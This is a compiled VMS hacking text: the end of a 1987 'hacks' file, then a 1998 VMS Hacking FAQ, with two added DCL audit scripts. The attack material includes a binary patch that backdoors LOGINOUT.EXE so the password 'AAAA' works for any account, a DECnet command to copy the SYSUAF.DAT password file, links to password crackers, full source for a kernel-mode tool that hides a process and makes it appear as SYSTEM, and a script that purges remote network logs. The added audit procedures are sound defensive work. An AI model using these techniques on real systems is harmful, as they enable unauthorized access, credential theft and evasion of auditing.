PATCH>REPLACE/INSTRUCTION 9D14

OLD>'MOVAB B^20(SP),B^1C(SP)'
OLD>EXIT
NEW>'CMPL B^20(SP),#41414141'
NEW>'BNEQ LBL'
NEW>'MOVL I^#1,R0'
NEW>'RET'
NEW>'LBL: MOVAB B^20(SP),B^1C(SP)'
NEW>EXIT
PATCH>UPDATE

$ INSTALL/REPLACE LOGINOUT.EXE
$ PURGE LOGINOUT.EXE

Then try logging in:

Username: SYSTEM
Password: AAAA

or

Username: ANY_ONE_WHO_EXISTS_ON_THIS_SYSTEM
Password: AAAA

The immediate #41414141 is the longword "AAAA" in ASCII, so the patched
LOGINOUT returns success (R0 = 1) for any existing username when that
password is supplied.  This works on V4.2 and V4.3, and probably V4.1 as
well; check that the MOVAB is at 9D14 with EXAMINE/INSTRUCTION before
applying the patch.

3. On most machines you will find the following also works (useful for
   accessing protected files).

  For example, to copy the SYSUAF.DAT file to your own directory, try:

 $ COPY NODE"DECNET DECNET"::SYS$SYSTEM:SYSUAF.DAT *.*

 where NODE is your local node name (the machine name, which can be found
 with SHOW NETWORK; the current node is the top one in the list).
 If the above doesn't work, try removing the second DECNET within the
 quotes.
 The two words within the quotes are the username and password of an
 account that has NETWORK access; DECNET is likely to have full access on
 most machines.

          These hacks are copyright of Lightfinger.     (c) 1987
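The three techniques above all leave something an administrator can look for: a SYSUAF logical name in the system table that points outside SYS$SYSTEM (and an ACL on LNM$SYSTEM_TABLE that let an ordinary user create it), a LOGINOUT.EXE whose contents have changed, and a DECnet default account that hands out file access. The DCL procedure below is an added example written for this edition, not part of Lightfinger's text. It assumes a privileged account, a reasonably modern OpenVMS with the documented CHECKSUM and SHOW SECURITY commands (V4.x systems lack them), DECnet Phase IV for the NCP step, and that you replace the placeholder KNOWN_GOOD value with a checksum you recorded earlier from a trusted copy of LOGINOUT.EXE.

```dcl
$! AUDIT_LOGIN_PATH.COM -- added example, not from Lightfinger's text.
$!
$! Looks for the traces left by the three methods above:
$!   1. a SYSUAF logical in the system table (and who may write that table)
$!   2. a LOGINOUT.EXE whose checksum differs from a recorded good value
$!   3. the DECnet executor's nonprivileged (default) account
$!
$! Assumptions: run from an account holding SYSPRV (or READALL); the DCL
$! CHECKSUM and SHOW SECURITY commands exist (not true on V4.x); DECnet
$! Phase IV (NCP) is installed.  KNOWN_GOOD is a placeholder you replace
$! with the value CHECKSUM$CHECKSUM gave on a trusted LOGINOUT.EXE.
$!
$ SET NOON
$ say := WRITE SYS$OUTPUT
$ known_good = "00000000"        ! placeholder, substitute your recorded value
$!
$! ---- 1. SYSUAF redirection ------------------------------------------------
$! The exploit defines an exec-mode SYSUAF in LNM$SYSTEM_TABLE, so look there.
$ sysuaf = F$TRNLNM("SYSUAF","LNM$SYSTEM_TABLE",,"EXECUTIVE",,"VALUE")
$ IF sysuaf .EQS. ""
$ THEN
$    say "SYSUAF: no system logical defined; LOGINOUT uses SYS$SYSTEM:SYSUAF.DAT"
$ ELSE
$    say "SYSUAF: system logical translates to ''sysuaf'"
$!   Resolve both specs to physical device/directory before comparing.
$    expected = F$PARSE("SYS$SYSTEM:SYSUAF.DAT",,,,"NO_CONCEAL")
$    actual   = F$PARSE(sysuaf,"SYS$SYSTEM:.DAT",,,"NO_CONCEAL")
$    IF actual .NES. expected THEN -
        say "*** REVIEW: SYSUAF resolves to ''actual' rather than ''expected'"
$ ENDIF
$! Method 1 depends on a user being able to add an ACL to the table itself;
$! no ordinary identifier should hold WRITE or CONTROL here.
$ say "Protection/ACL of LNM$SYSTEM_TABLE:"
$ SHOW SECURITY/CLASS=LOGICAL_NAME_TABLE LNM$SYSTEM_TABLE
$!
$! ---- 2. LOGINOUT.EXE integrity ------------------------------------------
$! Method 2 patches the image in place; a changed checksum (or a new version
$! number and modification date) is the visible result.
$ CHECKSUM SYS$SYSTEM:LOGINOUT.EXE
$ IF CHECKSUM$CHECKSUM .NES. known_good
$ THEN
$    say "*** REVIEW: LOGINOUT.EXE checksum ''CHECKSUM$CHECKSUM' differs from recorded ''known_good'"
$ ELSE
$    say "LOGINOUT.EXE checksum matches the recorded value"
$ ENDIF
$ DIRECTORY/DATE=MODIFIED/SIZE SYS$SYSTEM:LOGINOUT.EXE;*
$!
$! ---- 3. DECnet default account ------------------------------------------
$! Method 3 rides on the executor's "Nonprivileged user id" (DECNET by default).
$! Review that account's privileges and file access in AUTHORIZE afterwards.
$ say "DECnet executor characteristics (check the nonprivileged user id):"
$ MCR NCP SHOW EXECUTOR CHARACTERISTICS
$ EXIT
```

Run it as @AUDIT_LOGIN_PATH from a privileged account. A SYSUAF logical that points at a cluster-common directory is legitimate on many sites, which is why the procedure reports a difference for review rather than treating it as proof of compromise; a changed LOGINOUT.EXE checksum with no corresponding patch or upgrade, by contrast, always deserves a look.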

The VMS Hacking FAQ (Beta 0.03 Release) July 20th, 1998 by The Beave and Tsywt

	Here's one to add to your "uploads".  I still try to keep
up with it, but with my old MVII (or any VMS box) it's been hard.
Anyways, that's about to change.

----< Snip >------------------------------------------------------

		- VMS HACK FAQ (Frequently Ask Questions) -

			  - Beta 0.03 Release -
			     July 20th,  1998

	        Originally by The Beave (beave@vistech.net)
	     	Extra Contributions Add By Tsywt  

                http://www.vistech.net/users/beave/hack-vms-faq

Introduction:

	This article contains the answers to some frequently asked questions
	(hence the name FAQ) about hacking the VMS operating system.

	"Why a VMS Hacking FAQ?"

	Several reasons.  Once in a while, an escape from Unix is
	very, very nice.  Another reason is that the art of
	VMS hacking has all but vanished, and its replacement is
	statements like "Hacking VMS is impossible", "VMS is
	too cryptic to use", and as always, "Man, VMS sucks".

	These are generally statements by people who know almost
	zero about VMS.  I don't want to go into "which OS is
	better", because that would defeat the purpose of this
	file, but in my personal opinion both OSes have
	their advantages and disadvantages.

	I have, however, written this FAQ with a Unix slant
	to it, to help the reader understand what some of the
	examples are trying to accomplish.

	The article may be freely redistributed in its entirety provided
	that the credits are not altered or removed.  It may not be
	sold for profit or incorporated in commercial documents without
	the written permission of the author(s).

	This is the beta release of this article, which means
	the article is still a work in progress and is not complete.

	Submissions,  corrections,  comments,  input,  complaints, 
	bomb threats,   cash,  etc.,  should be directed toward
	the alt.2600 newsgroup or beave@vistech.net.  

 	If you make additions to the text,  please let me know.

Index ---:

More Common Newbie Questions:

1.  VMS Basic information ("What does VMS run on?")
2.  Identifying OpenVMS/VMS systems.  ("Is it a VMS box?")
3.  Password storage information (SYSUAF.DAT) ("Where the hell is the 
    /etc/passwd file??!?!?!")
4.  User storage information (RIGHTSLIST.DAT)
5.  Cracking the SYSUAF.DAT ("Is there a version of 'Crack' for VMS
    machines?")
6.  Becoming invisible in VMS ("Is there a 'Cloak' routine in VMS?")
7.  SET DEFAULT command ("How do I change damn directories?")
8.  The infamous "CD" .COM file ("I hate this SET DEFAULT crap") 
9.  LOGIN.COM ("Okay,  where's my .profile???").
10.  Captive Accounts ("I can't get to DCL"). 
11. Terminal Spoofing ("How can I passively gather passwords at a terminal?")
12. User Impersonation ("Can I masquerade as another user?")
13. Accounting/Auditing ("Who's watching me?")

VMS Mail Hack Routines:

1.  Unix/VMS Sendmail holes ("Will my sendmail holes work on VMS?")
2.  Mail Bomb ("I need to mailbomb a user from my VMS account, how?")

VMS Phone Hack Routines:

1.  Anonymous Phone Messages ("How do I become a VAXPhone phreaker?")
2.  Phone Directories ("How can I do a 'sh users' using the phone protocol?")

User/Image Privilege Information:

1.  Systems Privileges, Listing and explanation ("How are Priv's setup?")
2.  Creating privileged images ("Can I create a SUID Shell on a VMS box?")

DECNetwork Information.

1.  Brief Description of a DECNet ("What's a DECNet?")
2.  What it means to you ("What can it do for me?")
3.  Obtaining files/system info/etc ("How do I get information for the remote?")
4.  Using remote nodes ("How do I connect interactively?")
5.  Getting node lists ("How do I find connectable nodes?")
6.  Proxy Logins ("Can't DECNet nodes be protected?")
7.  Proxy Logs ("Are Proxy logins logged? Can I use it to break into nodes?") 
8.  Sneak Routing ("Can I get to a machine I normally couldn't through another
    machine?")

TCP/IP Connected VMS Machines. 

1.  Obtaining remote usernames without "FINGER" ("How do I get usernames
    if FINGER is disabled")
2.  Changing the image running in FINGER ("How do I link a command name to
    another so it appears I am running a different image?")
3.  The TCPDUMP sniffer

		-      More Common Newbie Questions      -

1.      "What does VMS run on?"

	VMS (Virtual Memory System) runs on Digital Equipment Corp.
	(DEC, pronounced "DECK") VAX (Virtual Address eXtension)
	machines and on DEC Alphas.  The user uses DCL (Digital Command
	Language) to interact with the computer.  These commands
	and their syntax are completely different from those of
	Unix and Unix-like operating systems, so a completely
	different mind-set is often required (this is the author's
	opinion).

2.	Identifying OpenVMS/VMS systems ("Is it VMS box?")

	Identification of a possible VMS system can usually be
	done at the "Username:" prompt.  Sometimes the welcome
	screen itself will reveal that it's a VMS system (for
	example, "Welcome to ABC Computer Under VMS 5.5-2").
	Let's assume that this is not the case.  There are still
	some "checks" that you can perform.  One key is that
	an invalid login attempt will give you a "User authorization
	failure" message.  This is a pretty good indication that
	the remote system is under VMS.  If you're still not
	convinced, a control-Z at the "Username:" prompt will
	result in an "Error reading command input" message.  For example:

Connected to upperdck.com
Escape character is '^]'.

	Welcome To The Upper-Deck Development Box

Username: *EXIT*
Error reading command input
End of file detected
Connection closed by foreign host.

	Identification of a VMS system should be fairly straightforward.

3.      "Where in the hell is the passwd file???!?!?!"

	There is no /etc/passwd file.  All user information is kept in
	a file called SYSUAF.DAT, which is stored in the directory
	(or rather, the logical name) SYS$SYSTEM.  This file is usually
	not readable by "normal" users.

	Older VMS systems (vanilla install) came with a few default
	accounts (SYSTEM, FIELD, etc.).  This is no longer the case
	with new releases.

4.	One file that is sometimes readable by "normal" users is
	SYS$SYSTEM:RIGHTSLIST.DAT.  This file has a list of users and
	their respective rights identifiers.  Since the file isn't
	very readable (it is embedded with control characters), an extraction
	program is a nice tool to have.  The following DCL procedure is
	just an example of such a program and probably shouldn't be
	used, especially on a large system, because of its inefficiency.

	* [Beave] - I have written several similar routines for VMS and
	PC based systems and will publish the code at a later date.
	C versions (if the remote VMS box has a C compiler) can be
	very handy.  As well, I would keep archives of the VMS
	executables (for systems without C compilers).

	Another thing to note here: as of OpenVMS 6.0, RIGHTSLIST.DAT
	is no longer readable by default.

$! Program: Extract_Rights.Com
$! Author: Tsywt
$!
$ On Error Then $Goto Exit
$!
$ If F$mode() .Nes. "INTERACTIVE" then goto BATCH_END
$
$ Inquire system "Please enter system"
$ If system .eqs. ""
$  Then
$   Open/share in sys$system:rightslist.dat
$ Else
$   Open/share in 'system'::sys$system:rightslist.dat
$ Endif
$ Open/write out users.dat
$ Read/nolock in record
$Read_Loop1:
$ Read/nolock in record /end=Done_Users
$! If not at start of environmental identifiers
$ If f$extract(16,6,record) .nes. "BATCH "
$  Then
$   Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Else
$   Goto Done_Users
$ Endif
$ Goto Read_Loop1
$Done_Users:
$ Close out
$ Open/write out rights.dat
$ Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$Read_Loop7:
$ Read/nolock in record /end=Done_Rights
$! holder is null
$ If f$extract(8,1,record) .eqs. ""
$  Then
$   Write out f$extract(0,4,record) + " " + f$extract(16,32,record)
$ Endif
$ Goto Read_Loop7
$Done_Rights:
$ Close out
$!
$ Open/write out users_ids.dat
$ Open in2 users.dat
$Read_Loop2:
$ position = 0
$ Read/nolock in2 record1 /end=Done_Program
$Read_Loop3:
$! Go to first record in file because can't do key search on id
$ Open/share in3 rights.dat
$! Search holders for user id
$ Read/nolock/error=Done_No_Id in -
   record2/index=1/key="''f$extract(0,4,record1)'"/end=Done_No_Id
$Read_Loop4:
$! Kluge because nulls cause problems on key search
$ If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$  Then
$   Read/nolock in record2/end=Done_No_Id
$   Goto Read_Loop4
$ Endif
$! Move to next holder match
$ temp_pos = position
$Read_Loop5:
$ If temp_pos .gt. 0
$  Then
$   Read/nolock in record2/end=Read_Loop2
$   If f$extract(8,4,record2) .nes. f$extract(0,4,record1)
$    Then
$     Goto Read_Loop2
$   Endif
$   temp_pos = temp_pos - 1
$   Goto Read_Loop5
$ Endif
$Read_Loop6:
$! Look for identifier id
$ Read/nolock in3 record3/end=Done_No_Id
$ If f$extract(0,4,record3) .eqs. f$extract(0,4,record2)
$  Then
$   Write out f$extract(5,32,record1) + " " + f$extract(5,32,record3)
$   position = position + 1
$   Close in3
$   Goto Read_Loop3
$ Endif
$ Goto Read_Loop6
$Done_No_Id:
$ Write out f$extract(5,32,record1)
$ Close in3
$ Goto Read_Loop2
$Done_Program:
$Exit:
$ Close/error=Close_In2 in
$Close_In2:
$ Close/error=Close_Out in2
$Close_Out:
$ Close out
$ Delete users.dat.
$ Delete rights.dat.
$ If system .nes. ""
$  Then
$   Submit/after="+:15"/keep/params=('system') extract_rights.com
$ Endif
$ Exit
$Batch_End:
$Clean_Up:
$! Clean up DECnet logging
$ Dir 'p1'::netserver.log
$ Purge 'p1'::netserver.log
$ Exit
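Whether SYSUAF.DAT and RIGHTSLIST.DAT can be read by a "normal" user comes down to their protection masks and ACLs, which is the thing to check on any system you administer. The following DCL procedure is added here as an example and is not taken from the FAQ: it reports both files' protection and flags GROUP or WORLD read access. It assumes an OpenVMS release with the F$FILE_ATTRIBUTES lexical and the SHOW SECURITY command, and an account that can at least read the file headers (SYSPRV or READALL gives a complete report).

```dcl
$! CHECK_AUTH_FILES.COM -- added example, not from the FAQ.
$!
$! Reports protection and ACL of the two authorization files discussed above
$! and warns when the protection mask grants GROUP or WORLD read access.
$! A readable SYSUAF.DAT is what offline password guessing needs; a readable
$! RIGHTSLIST.DAT hands out the username list (the default before OpenVMS 6.0).
$!
$! Assumptions: F$FILE_ATTRIBUTES and SHOW SECURITY are available; the caller
$! can read the file headers (SYSPRV/READALL for a complete report).
$!
$ SET NOON
$ say := WRITE SYS$OUTPUT
$ files = "SYS$SYSTEM:SYSUAF.DAT,SYS$SYSTEM:RIGHTSLIST.DAT"
$ i = 0
$ LOOP:
$   file = F$ELEMENT(i,",",files)
$   IF file .EQS. "," THEN GOTO DONE        ! F$ELEMENT returns the delimiter past the end
$   i = i + 1
$   IF F$SEARCH(file) .EQS. ""
$   THEN
$       say "''file': not found or not visible to this account"
$       GOTO LOOP
$   ENDIF
$!  "PRO" returns a string like "SYSTEM=RWED, OWNER=RWED, GROUP=, WORLD="
$   prot  = F$FILE_ATTRIBUTES(file,"PRO")
$   say "''file'  ''prot'"
$!  Take the access letters after "=" in the GROUP and WORLD fields.
$   group = F$EDIT(F$ELEMENT(1,"=",F$ELEMENT(2,",",prot)),"TRIM")
$   world = F$EDIT(F$ELEMENT(1,"=",F$ELEMENT(3,",",prot)),"TRIM")
$   IF F$LOCATE("R",world) .LT. F$LENGTH(world) THEN -
        say "*** WARNING: WORLD can read ''file'"
$   IF F$LOCATE("R",group) .LT. F$LENGTH(group) THEN -
        say "*** note: GROUP can read ''file'"
$!  ACL entries can grant access the protection mask does not show.
$   SHOW SECURITY 'file'
$   GOTO LOOP
$ DONE:
$ EXIT
```

The protection mask alone is not the whole story, which is why the procedure also prints SHOW SECURITY for each file: an identifier-based ACE granting READ to a general identifier gives exactly the access the mask appears to deny.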

5.      "Is there a version of "Crack" that I can run on a VMS machine?"

	The Unix program "Crack" will not work, but there are password
	guessing routines available.

	The best one I have seen is "GUESS_PASSWORD.EXE",  which can be
	obtained from the following sites.

	ftp.wku.edu:/vms/fileserv/uaf.zip
	ftp.spc.edu:/macro32/savesets/uaf.zip

	In order for the routine to work,  you need access to the
	SYSUAF.DAT.  This version works on both OpenVMS VAX and 
	OpenVMS AXP.

	There is also a program available for the PC called VMSCrack 1.0.
	Once again, it requires that you have access to the SYSUAF.DAT
	so that you can copy it to the PC.

6.      "Is there a 'Cloak' routine in VMS?"

	Yes.  Below is the code needed to make your process invisible
	to "FINGER", "SHOW USERS", etc.
	Also, check out Bruce Ellis' "Hitchhikers Guide to VMS"

	First,  create the following file:

Name: BUILD_INVISIBLE.COM
---------------------------------[Cut Here]-----------------------------------
$ save_verify = 'f$verify(0)'
$ system = "vax"        !Set to "alpha" for Alpha
$!
$!  File to build Ehud Gavron's INVISIBLE
$!
$!  Author:     Hunter Goatley
$!
$ say := write sys$output
$ on error then goto common_exit
$ on control_y then goto common_exit
$ say "Extracting $JIBDEF and $PCBDEF from LIB.MLB...."
$ library/macro/extr=$JIBDEF/out=jibdef.mar sys$library:lib.mlb
$ library/macro/extr=$PCBDEF/out=pcbdef.mar sys$library:lib.mlb
$ say "Converting $*DEF macros to C .H files...."
$ call convert_to_h jibdef.mar
$ call convert_to_h pcbdef.mar
$ say "Compiling INVISIBLE...."
$ cc invisible
$ say "Linking INVISIBLE...."
$ link/notrace invisible,invisible.opt_'system'/opt
$ say "INVISIBLE build completed"
$ common_exit:
$       exit f$verify(save_verify).or.1
$ convert_to_h: subroutine
$ name = f$parse(p1,"","","NAME")
$ open/read tmp 'p1'
$ create 'name'.H
$ open/append tmph 'name'.H
$ cvt_loop:
$    read/error=cvt_fin tmp line
$    if f$extract(0,4,line).nes."$EQU" then goto cvt_loop
$    write tmph "#define ",f$extract(4,255,line)
$    goto cvt_loop
$ cvt_fin:
$    close tmp
$    close tmph
$ write sys$output "C header file ''name'.H created"
$ exit
$ endsubroutine
-------------------------------[End Of File]-----------------------------------

	Next is the C Code for the "INVISIBLE" routine....

Name:  INVISIBLE.C
---------------------------------[Cut Here]------------------------------------
/*
 * Invisible    - Make a process invisible and visible again.  Originally
 *                written in MACRO32.  Now in C so it runs on Alpha too.
 *
 *
 *      Option file invisible.opt:
 *              ALPHA:  sys$loadable_images:sys$base_image.exe/share
 *
 *              VAX:    sys$system:sys.stb/selective_search
 *
 *
 *      Build:
 *              $ cc invisible
 *              $ link invisible,invisible/opt
 *
 *      Usage:
 *              $ run invisible
 *
 *
 *  Ehud Gavron
 *  ACES Consulting Inc.
 *  Gavron@ACES.COM
 *
 *      14-Oct-1992     Ehud Gavron     Ported to C, Alpha, ANSI, and 
 *                                      everything else.
 *
 */

#define module_name INVISIBLE
#define module_version "V1.0.0"

#ifdef __alpha
#pragma module module_name module_version
#else /* __vax */
#module module_name module_version
#endif /* __alpha */

#ifndef __alpha
#define sys$gl_ijobcnt sys$gw_ijobcnt
#endif

#include <descrip.h>
#include "jibdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include "pcbdef.h"     /* Extracted from LIB.MLB and massaged into C form */
#include <ssdef.h>
#include <jpidef.h>
#include <psldef.h>
#include <lnmdef.h>
typedef union {
	struct {
		short s_buflen;
		short s_itemcode;
		char *s_bufaddr;
		int *s_retlen;
		} s;
	unsigned long end;
	} ITEMLIST;

#define buflen          s.s_buflen
#define itemcode        s.s_itemcode
#define bufaddr         s.s_bufaddr
#define retlen          s.s_retlen

struct ISB {
	int     l_uic;
	int     l_namelen;
#ifdef __alpha
	int     l_jobtype;
#else
	char    b_jobtype;
#endif
	char    b_terminal;
	char    t_lname[PCB$S_LNAME + 1];
	char    t_username[JIB$S_USERNAME + 1];
	};

struct ISB isb;
static int lnm_retlen;

ITEMLIST lnm_itmlst[2];
ITEMLIST jpi_itmlst[2];
struct dsc$descriptor_s prcnam_desc;
struct dsc$descriptor_s prcnam;
$DESCRIPTOR(lnm_tabnam,"LNM$PROCESS_TABLE");
$DESCRIPTOR(lnm_lognam,"ISB");
$DESCRIPTOR(fao_prcnam,"SYMBIONT_!UL");
int sysuic = 0x00010004;
char sysusername[] = "SYSTEM        ";
char namebuf[PCB$S_LNAME];

#ifdef __alpha
main()
#else
cmain()
#endif
{
	int sys$cmkrnl(),sys$exit(),invisible_k();
	int ss_stat;

	lnm_itmlst[0].buflen = sizeof(isb);
	lnm_itmlst[0].itemcode = LNM$_STRING;
	lnm_itmlst[0].bufaddr = (char *)&isb;
	lnm_itmlst[0].retlen = &lnm_retlen;
	lnm_itmlst[1].end = 0;

	jpi_itmlst[0].buflen = PCB$S_LNAME;
	jpi_itmlst[0].itemcode = JPI$_PRCNAM;
	jpi_itmlst[0].bufaddr = (char *)&isb.t_lname;
	jpi_itmlst[0].retlen = (int *)&isb.l_namelen;
	jpi_itmlst[1].end = 0;

	prcnam_desc.dsc$a_pointer = (char *)&isb.t_lname;
	prcnam_desc.dsc$w_length = PCB$S_LNAME;
	prcnam_desc.dsc$b_dtype = DSC$K_DTYPE_T;
	prcnam_desc.dsc$b_class = DSC$K_CLASS_S;

	prcnam.dsc$a_pointer = (char *)&namebuf;
	prcnam.dsc$w_length = PCB$S_LNAME;
	prcnam.dsc$b_dtype = DSC$K_DTYPE_T;
	prcnam.dsc$b_class = DSC$K_CLASS_S;

	ss_stat = sys$cmkrnl(invisible_k,0);
	(void) sys$exit(ss_stat);       
}

int invisible_k()
{
	int sys$getjpiw(),sys$crelnm(),sys$fao(),sys$setprn();
	int strncpy(),sys$exit(),sys$trnlnm(),sys$dellnm();
	int *a_long;
	int acmode = PSL$C_KERNEL;

#pragma nostandard                      /* Oh well */
	globalref ctl$gl_pcb;
	globalref sys$gl_ijobcnt;
#pragma standard

	int ss_stat;
	char *pcb;
	char *jib;
	long *sts;
	long *own;
	char *p;
	long *q;
	int loop = 0;

	pcb = (char *)ctl$gl_pcb;

	if (pcb == 0) {
	   return(0);
	   }
	q = (long *)((char *)pcb + PCB$L_JIB);
	jib =(char *)  *q;

	sts = (long *)((char *)pcb + PCB$L_STS);

	if (*sts & PCB$M_INTER) {       /* Do stealth mode */
	   *sts = *sts^PCB$M_INTER;
	   *sts = *sts|PCB$M_NOACNT;

	   own = (long *)((char *)pcb + PCB$L_OWNER);
	   if (*own == 0) {  /* We are not a subprocess  */
	      sys$gl_ijobcnt--;
	      }

	   p = (char *)pcb + PCB$T_TERMINAL;
	   isb.b_terminal = *p;
	   *p = '\0'; 

#ifdef __alpha
	   q = (long *)((char *)jib + JIB$L_JOBTYPE);
	   isb.l_jobtype = *q;
	   *q = 0;
#else
	   p = (char *)jib + JIB$B_JOBTYPE;
	   isb.b_jobtype = *p;
	   *p = '\0';
#endif
	   strncpy((char *)&isb.t_username,
		   (char *)(jib + JIB$T_USERNAME),
		   JIB$S_USERNAME);

	   strncpy((char *)(jib + JIB$T_USERNAME),
		   (char *)&sysusername,
		   JIB$S_USERNAME);

	   q = (long *)((char *)pcb + PCB$L_UIC);
	   isb.l_uic = *q;
	   *q = sysuic;

	   ss_stat = sys$getjpiw(0,0,0,&jpi_itmlst,0,0,0);
	   if (!(ss_stat & 1)) return(ss_stat);
	   ss_stat = sys$crelnm(0,
				&lnm_tabnam,
				&lnm_lognam,
				&acmode,
				&lnm_itmlst);
	   if (!(ss_stat & 1)) return(ss_stat);
	   do {
	      loop++;
	      prcnam.dsc$w_length = PCB$S_LNAME;
	      ss_stat = sys$fao((char *)&fao_prcnam,
				(char *)&prcnam.dsc$w_length,
				(char *)&prcnam,
				loop);
	      if (!(ss_stat &1)) return(ss_stat);
	      ss_stat = sys$setprn((char*)&prcnam);
	      } while (ss_stat == SS$_DUPLNAM);      
	   return(SS$_NORMAL);
	   }
	else {  /* unstealth */
	   ss_stat = sys$trnlnm(0,
				&lnm_tabnam,
				&lnm_lognam,
				&acmode,
				&lnm_itmlst);
	   if (!(ss_stat & 1)) return(ss_stat);

	   ss_stat = sys$dellnm(&lnm_tabnam,
				&lnm_lognam,
				&acmode);
	   if (!(ss_stat & 1)) return(ss_stat);

	   *sts = *sts|PCB$M_INTER;
	   *sts = *sts^PCB$M_NOACNT;

	   own = (long *)((char *)pcb + PCB$L_OWNER);
	   if (*own == 0) {  /* We are not a subprocess  */
	      sys$gl_ijobcnt++;
	      }

	   q = (long *)((char *)pcb + PCB$L_UIC);
	   *q = isb.l_uic;

	   p = (char *)pcb + PCB$T_TERMINAL;
	   *p = isb.b_terminal;

#ifdef __alpha
	   q = (long *)((char *)jib + JIB$L_JOBTYPE);
	   *q = isb.l_jobtype;
#else
	   p = (char *)jib + JIB$B_JOBTYPE;
	   *p = isb.b_jobtype;
#endif
	   strncpy((char *)(jib + JIB$T_USERNAME),
		   (char *)&isb.t_username,
		   JIB$S_USERNAME);

	   prcnam_desc.dsc$w_length = (short)isb.l_namelen;
	   ss_stat = sys$setprn(&prcnam_desc);
	   return(ss_stat);
	}
}

#ifndef __alpha
int strncpy(a,b,c)
char *a,*b;
int c;
{
	for (; c > 0; c--) {
	  *a++ = *b++;
	  }
}
#endif
--------------------------------[End Of File]----------------------------------

	After these files are created, type the following at your
	DCL prompt:

$ @build_invisible      ! This will build our INVISIBLE.EXE routine.
$ run invisible         ! Once the build is complete.

	You should be completely "cloaked".

	Two things to note.  The link step expects an options file,
	INVISIBLE.OPT_VAX or INVISIBLE.OPT_ALPHA, containing the line given
	in the header comment of INVISIBLE.C (sys$system:sys.stb/selective_search
	on VAX, sys$loadable_images:sys$base_image.exe/share on Alpha).  And
	RUN INVISIBLE needs the CMKRNL privilege: the program calls sys$cmkrnl
	to rewrite its own PCB and JIB, which is what lets it change the UIC,
	username and terminal fields.  Running it a second time restores them.

	To obtain full source, readme files,  etc,  you can obtain this
	program from:

	ftp.wku.edu:/vms/fileserv/invisible.zip
	ftp.spc.edu:/macro32/savesets/invisible.zip

7.      "How do I change damn directories?"

	This is done via the "SET DEFAULT" command.  In the following 
	format:

$ SET DEFAULT device:[directory]

	VMS uses a standard hierarchical system in which devices and
	directories are separate.  For example, our home device/directory
	might be:

	DISK3:[USR.JOEHACKER]

	DISK3: would represent the device that we are on/using,
	while [USR.JOEHACKER] would signify the actual directory
	on that device that we are using.  So, to change directories,
	we could type:

$ SET DEFAULT [USR.BOB]

	If [USR.BOB] is an existing directory, this would now be our
	current path (and we would still be located on the DISK3:
	device).  If we wanted to simply back out one level (to
	[USR]) on that device, we would issue the following command:

$ SET DEFAULT [-]

	The "[-]" signifies one directory back.  So if our path is,
	[USR.BOB.HACKING.VMS.PROGRAMS],  and we want to get to the 
	[USR.BOB] directory,  instead of typing the entire path 
	again,  we could simply type:

$ SET DEFAULT [---]

	"[---]" means,  back out three levels of the hierarchy. 

	There can be several devices on one VMS system (device names
	can be obtained via a "SHOW DEVICES").  While your
	home directory might be on DISK3, another user's could
	be on device DISK2.  To switch devices, we add the
	device name, followed by the directory (if needed).
	So, if you need to get to a user who stores information
	in the DISK2:[REALLY.SECRET.STUFF] directory, you could
	type the following DCL command:

$ SET DEFAULT DISK2:[REALLY.SECRET.STUFF]

	Or if we are currently in DISK3:[REALLY] and we want
	to get to the information in the DISK2:[REALLY] directory,
	we could simply type

$ SET DEFAULT DISK2:

	And the rest would be carried over. 

	In the event that you need to get to the top of the hierarchy
	(Unix equivalent: "cd /"), SET DEFAULT to "[000000]" on any
	disk-structured device.  For example, to get to the very
	top of the hierarchy on device DISK2, you would type:

$ SET DEFAULT DISK2:[000000]

	VMS will also allow you to SET DEFAULT to a directory that does
	not exist.  When this happens,  the operating system will 
	inform you of this when you try to issue a command that requires
	some sort of file I/O.   If at any point you get completely 
	lost,  you can return to your "home" directory by typing

$ SET DEFAULT SYS$LOGIN:

8.      "I hate this SET DEFAULT crap.  Can I just use the 'cd' command like
	 I do in Unix?"

	By default, no.  There are two things that you can do.
	One, add the following line to your "LOGIN.COM" (see the
	LOGIN.COM question, "Okay, where's my .profile???", for more
	information):

$ CD :== SET DEFAULT    ! I hate typing that long "SET DEF" command

	Or you can use the following .COM file, which will guarantee
	that you eat as many resources as you can......

	      [Taken from Phrack,  Vol. 2.  Issue 19.,  File 2]
			   [ Coded By The Mentor ]

			      Code for CD.COM
			       >>>>>>>>>>>>>>>

$! CD.COM v6.09
$! The Ultimate Change Directory Command.
$!
$  hdir     = f$trnlnm("SYS$LOGIN")                 ! Home Directory
$  ndir     = f$edit(p1,"UPCASE")                   ! New  Directory
$  odir     = f$environment("DEFAULT")              ! Old  Directory
$  prompton = (f$edit(f$trnlnm("SYS$PROMPT"),"UPCASE") .eqs. "ON")
$!
$  if (ndir .eqs. "")           then goto DISPLAY   ! No Dir
$  if (ndir .eqs. "*")          then goto DIRSEARCH ! Search for Dirs
$  if (ndir .eqs. "?")          then goto HELP      ! Instructions
$!
$  PARSE:
$  length   = f$length(ndir)                        ! Fix up ndir
$  if (f$location("@",ndir) .eq. 0) .or. -
      (f$location("$",ndir) .eq. 0) then ndir = f$extract(1, length - 1, ndir)
$  right    = f$location("]",ndir) + 1
$  if (right .gt. length) then right = f$location(">", ndir)
$  if (right .le. length) then ndir  = f$extract(0, right, ndir)
$!
$  if (f$trnlnm(ndir) .eqs. "") then goto CASESYM   ! Not Logical Name
$     ndir   = f$trnlnm(ndir)                       ! Logical Name
$     goto PARSE
$!
$  CASESYM:
$  if ("''&ndir'" .eqs. "")     then goto CASE0     ! Not Symbol
$     ndir = 'ndir'                                 ! Symbol
$     goto PARSE
$!
$  CASE0:
$  len_ndir = f$length(ndir)                        ! Regular Dir
$  if (f$location("[", ndir) .lt. len_ndir) .or. -
      (f$location("<", ndir) .lt. len_ndir) then goto SETDIR
$!
$  CASE1:                                           ! Home Dir
$  if ((ndir .nes. "HOME") .and. (ndir .nes. "\")) then goto CASE2
$     ndir = hdir
$     goto SETDIR
$!
$  CASE2:                                           ! . .. .dir
$  if (f$location(".", ndir) .nes. 0) then goto CASE3
$     if (ndir .eqs. "..") then ndir = "-"
$     if (f$extract(0, 2, ndir) .eqs. "..") -
	 then ndir = "-" + f$extract(1, len_ndir - 1, ndir)
$     ndir = "[" + ndir + "]"
$     if (ndir .eqs. "[.]") then ndir = odir
$     goto SETDIR
$!
$  CASE3:                                           ! :
$  if (f$location(":", ndir) .ge. len_ndir) then goto CASE4
$     left    = f$location(":", ndir) + 1
$     symbol  = f$extract(left, 1, ndir)
